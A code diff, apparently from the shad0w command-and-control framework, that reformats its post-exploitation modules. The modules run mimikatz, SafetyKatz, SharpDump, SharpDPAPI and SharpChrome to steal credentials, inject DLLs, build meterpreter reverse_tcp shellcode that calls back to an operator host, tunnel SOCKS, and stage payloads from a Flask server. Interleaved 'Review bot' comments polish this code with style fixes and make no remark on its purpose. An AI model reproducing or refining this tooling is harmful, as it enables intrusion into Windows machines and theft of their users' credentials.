|
||||
|
||||
def get_list_directory(rargs, args):
|
||||
# resolve the directory we need to list
|
||||
|
||||
|
@ -46,6 +48,7 @@ def ls_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# save the raw args
|
||||
|
@ -67,9 +70,9 @@ ls "C:\\Documents and Settings"
|
|||
"""
|
||||
|
||||
parse = argparse.ArgumentParser(prog='ls',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
parse.error = error
|
||||
|
@ -99,4 +102,4 @@ ls "C:\\Documents and Settings"
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = ls_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -12,19 +12,19 @@ __type__ = "module"
|
|||
|
||||
EXEC_ID = 0x3000
|
||||
|
||||
|
||||
class DummyClass(object):
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
# Let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
#global ERROR, error_list
|
||||
#ERROR = True
|
||||
print(f"\033[0;31m{message}\033[0m\n")
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
|
||||
|
@ -66,7 +66,7 @@ def main(shad0w, args):
|
|||
# Setup the args, set default='' to show help message when missing
|
||||
parser.add_argument("--port", required=True, help="Port you would like Metasploit to call")
|
||||
parser.add_argument("--host", required=True, help="Host/IP you would like Metasploit to call")
|
||||
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
|
||||
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp", required=False, default="windows/x64/meterpreter/reverse_tcp")
|
||||
|
||||
# Make sure we don't die from weird args
|
||||
try:
|
||||
|
@ -85,7 +85,7 @@ def main(shad0w, args):
|
|||
return
|
||||
|
||||
# Generate and read the msfvenom shellcode
|
||||
rcode = msfvenom_payload_gen(shad0w, payload = args.payload, lport = args.port, lhost = args.host, arch="x64")
|
||||
rcode = msfvenom_payload_gen(shad0w, payload=args.payload, lport=args.port, lhost=args.host, arch="x64")
|
||||
|
||||
# Set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
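Review bot: `--port` is accepted as an arbitrary string and passed to `msfvenom_payload_gen` as `lport`; adding `type=int` to that `parser.add_argument("--port", required=True, ...)` call lets argparse reject non-numeric values before the helper runs. The helper's body is not visible here, so it may need `str(lport)` where the value is used. The comment above the arguments mentions `default=''` although both options are `required=True`. The commented-out `#global ERROR, error_list` and `#ERROR = True` lines in `error` could be deleted in the same pass.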
|
||||
|
|
|
@ -21,15 +21,17 @@ DLLINJECT_EXEC_ID = 0x5000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def build_inject_info(args, rcode):
|
||||
|
||||
|
@ -43,6 +45,7 @@ def build_inject_info(args, rcode):
|
|||
|
||||
return json.dumps(info)
|
||||
|
||||
|
||||
def generate_beacon_code(shad0w):
|
||||
buildtools.clone_source_files(rootdir='injectable')
|
||||
|
||||
|
@ -63,6 +66,7 @@ def generate_beacon_code(shad0w):
|
|||
|
||||
return buildtools.extract_shellcode()
|
||||
|
||||
|
||||
def format_shellcode(shellcode):
|
||||
hshellcode = ""
|
||||
|
||||
|
@ -76,6 +80,7 @@ def format_shellcode(shellcode):
|
|||
|
||||
return hshellcode
|
||||
|
||||
|
||||
def write_header(code, file_loc):
|
||||
hex_code = format_shellcode(code)
|
||||
|
||||
|
@ -90,12 +95,14 @@ unsigned int beacon_bin_len = %s;
|
|||
|
||||
return
|
||||
|
||||
|
||||
def get_dll_data(file_loc):
|
||||
with open(file_loc, "rb") as file:
|
||||
data = file.read()
|
||||
|
||||
return base64.b64encode(data).decode()
|
||||
|
||||
|
||||
def generate_beacon_dll(shad0w, rcode):
|
||||
# write header file
|
||||
write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h")
|
||||
|
@ -105,13 +112,14 @@ def generate_beacon_dll(shad0w, rcode):
|
|||
made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64")
|
||||
|
||||
# check that the dll has built
|
||||
if made != True:
|
||||
if made is not True:
|
||||
shad0w.debug.error("Error building migrate dll.")
|
||||
return
|
||||
|
||||
# return the base64 dll data
|
||||
return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
|
||||
|
||||
|
||||
def await_impersonate(shad0w, pid):
|
||||
while True:
|
||||
if shad0w.beacons[shad0w.current_beacon]["impersonate"] == None:
|
||||
|
@ -128,6 +136,7 @@ def await_impersonate(shad0w, pid):
|
|||
shad0w.debug.good(f"Successfully migrated ({pid})")
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
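Review bot: `await_impersonate` still tests `shad0w.beacons[shad0w.current_beacon]["impersonate"] == None` although this commit converts the other comparisons in the file to identity checks (`message is not None`, `made is not True`); `... ["impersonate"] is None:` keeps the file consistent. Note that `made is not True` is stricter than the old `made != True`, since a truthy non-bool such as `1` now takes the error path. If `make_in_clone` only ever returns `True` or a falsy value, as its visible `return True` suggests but does not prove, `if not made:` is the usual spelling. The loop body of `await_impersonate` lies outside the hunk.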
|
||||
|
|
|
@ -20,17 +20,18 @@ MIMIKATZ_BIN = "/root/shad0w/bin/mimikatz.x64.exe"
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def mimikatz_callback(shad0w, data):
|
||||
data = data.replace(".#####.", "\033[1;32m.#####.\033[0m")
|
||||
data = data.replace(".## ^ ##.", "\033[1;32m.##\033[0m \033[1;39m^\033[0m \033[1;32m##.\033[0m")
|
||||
|
@ -43,6 +44,7 @@ def mimikatz_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -101,4 +103,4 @@ mimikatz -x sekurlsa::logonpasswords
|
|||
b64_comp_data = shellcode.generate(MIMIKATZ_BIN, args, params)
|
||||
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback
|
||||
|
|
|
@ -9,7 +9,7 @@ __description__ = "Create a new directory on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_MKDIR = 0x5000
|
||||
|
||||
ERROR = False
|
||||
|
@ -21,9 +21,11 @@ def error(message):
|
|||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def mkdir_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
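Review bot: `exit()` is rewritten to `if message is not None:` in this module only, while the same helper shown as unchanged context in the other command modules of this commit still reads `if message != None: print(message)`, so the tidy-up is applied unevenly. The function also shadows the builtin `exit` and never uses its `status` parameter. Judging by the `parse.exit = exit` line visible in the rm module, it is presumably an argparse hook, and a one-line docstring such as `"""argparse exit hook: print the message and return instead of exiting."""` would make that explicit. Because the `error`/`exit` pair is repeated in each module, a single shared helper would stop the copies drifting apart; whether a suitable common module exists is not visible here.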
|
|
|
@ -9,14 +9,16 @@ __description__ = "Show running processes"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "process"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_PID = 0x8000
|
||||
|
||||
|
||||
def ps_callback(shad0w, data):
|
||||
sys.stdout.write(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -30,4 +32,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = ps_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -28,21 +28,24 @@ error_list = ""
|
|||
# make the command output a bit cleaner
|
||||
FIRST_OUTPUT = True
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def psh_callback(shad0w, data):
|
||||
global FIRST_OUTPUT
|
||||
|
||||
|
@ -59,9 +62,11 @@ def psh_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def encode_string(data):
|
||||
return base64.b64encode(data.encode())
|
||||
|
||||
|
||||
def random_string():
|
||||
rstring = ""
|
||||
alphabet = string.ascii_lowercase + string.ascii_uppercase
|
||||
|
@ -71,10 +76,12 @@ def random_string():
|
|||
|
||||
return rstring
|
||||
|
||||
|
||||
def do_copy():
|
||||
os.system("cp /root/shad0w/modules/windows/psh/*.cs /root/shad0w/modules/windows/psh/build")
|
||||
os.system("cp /root/shad0w/modules/windows/psh/*.dll /root/shad0w/modules/windows/psh/build")
|
||||
|
||||
|
||||
def write_args(pwsh):
|
||||
do_copy()
|
||||
|
||||
|
@ -90,6 +97,7 @@ def write_args(pwsh):
|
|||
with open("/root/shad0w/modules/windows/psh/build/main.cs", "w") as file:
|
||||
file.write(new_file)
|
||||
|
||||
|
||||
def compile_binary():
|
||||
cwd = os.getcwd()
|
||||
|
||||
|
@ -97,6 +105,7 @@ def compile_binary():
|
|||
os.system("mcs /reference:System.Management.Automation.dll -out:psh.exe main.cs")
|
||||
os.chdir(cwd)
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
raw_args = args
|
||||
|
|
|
@ -7,14 +7,16 @@ __description__ = "Show the current working directory on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_PWD = 0x3000
|
||||
|
||||
|
||||
def pwd_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -28,4 +30,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = pwd_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -15,21 +15,24 @@ OPCODE_RM = 0x4000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def rm_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# save the raw args
|
||||
|
@ -48,9 +51,9 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
|
|||
"""
|
||||
|
||||
parse = argparse.ArgumentParser(prog='rm',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
parse.error = error
|
||||
|
@ -77,4 +80,4 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = rm_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of safetykatz binary
|
||||
SAFETYKATZ_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SafetyKatz.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def safetykatz_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of seatbelt binary
|
||||
SEATBELT_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Seatbelt.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def seatbelt_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
help_stuff = """
|
||||
%&&@@@&&
|
||||
|
@ -206,6 +209,7 @@ def usage():
|
|||
"""
|
||||
print(help_stuff)
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -10,16 +10,18 @@ __type__ = "beacon"
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
global ERROR
|
||||
|
||||
|
@ -77,4 +79,4 @@ set -v MsfStageSize -d 14
|
|||
shad0w.debug.error("Key Error")
|
||||
return
|
||||
|
||||
return
|
||||
return
|
||||
|
|
|
@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of Sharpchrome binary
|
||||
SHARPCHROME_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpChrome.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpchrome_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
pass
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,19 +16,22 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharpdpapi binary
|
||||
SHARPDPAPI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDPAPI.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpdpapi_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
pass
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharpdump binary
|
||||
SHARPDUMP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDump.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpdump_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,8 +16,9 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharphound binary
|
||||
SHARPHOUND_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpHound.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
@ -26,6 +27,7 @@ def sharphound_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -26,22 +26,25 @@ error_list = ""
|
|||
# location of sharpsocks binary
|
||||
sharpsocks_BIN = "/root/shad0w/bin/SharpSocks.x86.exe"
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def sharpsocks_callback(shad0w, data):
|
||||
if shad0w.sharpsocks_verbose:
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd_line=None):
|
||||
# modules directory
|
||||
modules_dir = "/root/shad0w/modules/windows/sharpsocks/"
|
||||
|
@ -64,8 +67,8 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
|
|||
|
||||
try:
|
||||
os.unlink("/tmp/sharpsocks.log")
|
||||
except: pass
|
||||
|
||||
except:
|
||||
pass
|
||||
|
||||
data = ""
|
||||
for _ in range(0, 5):
|
||||
|
@ -89,10 +92,12 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
|
|||
|
||||
return key
|
||||
|
||||
|
||||
def kill_server():
|
||||
os.popen("killall -9 SharpSocksServe")
|
||||
return
|
||||
|
||||
|
||||
def await_for_socks_start(shad0w):
|
||||
while True:
|
||||
try:
|
||||
|
@ -105,6 +110,7 @@ def await_for_socks_start(shad0w):
|
|||
except FileNotFoundError: pass
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
global EXEC_SHARPSOCKS
|
||||
|
||||
|
@ -148,7 +154,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
|
|||
pass
|
||||
|
||||
# make sure we have an argument
|
||||
if (len(raw_args) == 1):
|
||||
if len(raw_args) == 1:
|
||||
parse.print_help()
|
||||
return
|
||||
|
||||
|
@ -192,4 +198,4 @@ sharpsocks client -s http://your.redirector:port/ -k key
|
|||
b64_comp_data = shellcode.generate(sharpsocks_BIN, args, args.param)
|
||||
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
|
||||
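Review bot: The reflowed handler around `os.unlink("/tmp/sharpsocks.log")` is still a bare `except:`, which also swallows `KeyboardInterrupt`, `SystemExit` and permission errors instead of only the "log file does not exist yet" case. `await_for_socks_start` in this same file already uses `except FileNotFoundError: pass`, so the consistent form here is `except FileNotFoundError:` followed by `pass`. The 404 handler `not_found` later in this commit keeps the same bare `except:` around the `["serve"]` lookup; a `KeyError` is probably the case it means to ignore, but that should be confirmed against the full function. `start_sharpsocks_server` starts and ends outside the hunk, so this is based on the visible lines only.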
|
|
|
@ -16,16 +16,18 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of SharpUp binary
|
||||
SHARPUP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpUp.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpup_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of sharpwmi binary
|
||||
SHARPWMI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpWMI.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def sharpwmi_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def usage():
|
||||
pass
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -21,16 +21,18 @@ error_list = ""
|
|||
FILE_TO_UPLOAD = ""
|
||||
FILE_DATA = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def upload_callback(shad0w, data):
|
||||
global FILE_TO_UPLOAD, FILE_DATA
|
||||
|
||||
|
@ -66,8 +68,8 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
|
|||
|
||||
# init the parser
|
||||
parse = argparse.ArgumentParser(prog='upload',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
|
@ -138,4 +140,4 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = upload_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
|
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of Watson binary
|
||||
WATSON_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Watson.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def watson_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -21,16 +21,18 @@ TMP_EXEC_ID = 0x3000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def whoami_callback(shad0w, data):
|
||||
if len(data) > 1:
|
||||
print("")
|
||||
|
@ -38,6 +40,7 @@ def whoami_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def get_whoami_args(args):
|
||||
data = ""
|
||||
|
||||
|
@ -52,6 +55,7 @@ def get_whoami_args(args):
|
|||
|
||||
return data
|
||||
|
||||
|
||||
async def main(shad0w, args):
|
||||
global ERROR
|
||||
|
||||
|
@ -124,4 +128,4 @@ whoami --groups
|
|||
rcode = base64.b64encode(shellcode.generate(file, None, None, parse=False)).decode()
|
||||
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = whoami_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)
|
||||
|
|
|
@ -4,6 +4,7 @@ Compile the stuff
|
|||
|
||||
import os
|
||||
|
||||
|
||||
class Binary(object):
|
||||
def __init__(self):
|
||||
super(Binary, self).__init__()
|
||||
|
|
|
@ -16,6 +16,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
|
|||
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
|
||||
from prompt_toolkit.shortcuts import prompt, CompleteStyle, PromptSession
|
||||
|
||||
|
||||
class Console(object):
|
||||
|
||||
def __init__(self, shad0w):
|
||||
|
@ -102,7 +103,8 @@ class Console(object):
|
|||
print("ERROR:", e)
|
||||
|
||||
# if in debug mode drop the full traceback
|
||||
if self.shad0w.debugv: traceback.print_exc()
|
||||
if self.shad0w.debugv:
|
||||
traceback.print_exc()
|
||||
|
||||
pass
|
||||
except KeyboardInterrupt:
|
||||
|
|
|
@ -2,6 +2,7 @@ import sys
|
|||
import time
|
||||
import threading
|
||||
|
||||
|
||||
class Debug(object):
|
||||
def __init__(self, arg):
|
||||
super(Debug, self).__init__()
|
||||
|
@ -36,8 +37,7 @@ class Debug(object):
|
|||
|
||||
sys.stdout.write("\r")
|
||||
|
||||
|
||||
def spinner(self, text):
|
||||
spin_thread = threading.Thread(target=self.do_spinner, args=(text,))
|
||||
spin_thread.daemon = False
|
||||
spin_thread.start()
|
||||
spin_thread.start()
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
import random
|
||||
|
||||
|
||||
class XOR(object):
|
||||
def __init__(self):
|
||||
super(XOR, self).__init__()
|
||||
|
@ -8,6 +9,7 @@ class XOR(object):
|
|||
def gen_key(self):
|
||||
self.key = random.randint(10, 100)
|
||||
|
||||
|
||||
def crypt_file(self, crypt, key, infile=None, data=None, data_length=None):
|
||||
bytes = ""
|
||||
if (infile != None) and (data == None):
|
||||
|
|
|
@ -11,13 +11,14 @@ from flask import Flask, request, jsonify, Response
|
|||
app = Flask(__name__)
|
||||
|
||||
# shut flask output up
|
||||
log = logging.getLogger('werkzeug')
|
||||
log.disabled = True
|
||||
cli = sys.modules['flask.cli']
|
||||
log = logging.getLogger('werkzeug')
|
||||
log.disabled = True
|
||||
cli = sys.modules['flask.cli']
|
||||
cli.show_server_banner = lambda *x: None
|
||||
|
||||
IGNORE_CONTENT = ""
|
||||
|
||||
|
||||
@app.before_request
|
||||
def log_request():
|
||||
# this will show every request that the flask server gets
|
||||
|
@ -27,6 +28,7 @@ def log_request():
|
|||
# do nothing just return
|
||||
return None
|
||||
|
||||
|
||||
@app.route("/")
|
||||
def web_blank_page():
|
||||
# this page should never be hit by a legit beacon, so if it is then its not a beacon.
|
||||
|
@ -39,6 +41,7 @@ def web_blank_page():
|
|||
elif shad0w.mirror is not None:
|
||||
return shad0w.page_data
|
||||
|
||||
|
||||
@app.route("/register", methods=["GET", "POST"])
|
||||
def web_register_beacon():
|
||||
# register the beacon
|
||||
|
@ -48,18 +51,21 @@ def web_register_beacon():
|
|||
# just give it the request so it can pull stuff out itself
|
||||
return phandle.register_beacon(request)
|
||||
|
||||
|
||||
@app.route("/tasks", methods=["GET", "POST"])
|
||||
def web_task_beacon():
|
||||
# register a task on a beacon
|
||||
|
||||
return phandle.task_beacon(request)
|
||||
|
||||
|
||||
@app.route("/stage", methods=["GET", "POST"])
|
||||
def web_stage_beacon():
|
||||
# send the requested stage to a beacon
|
||||
|
||||
return phandle.stage_beacon(request)
|
||||
|
||||
|
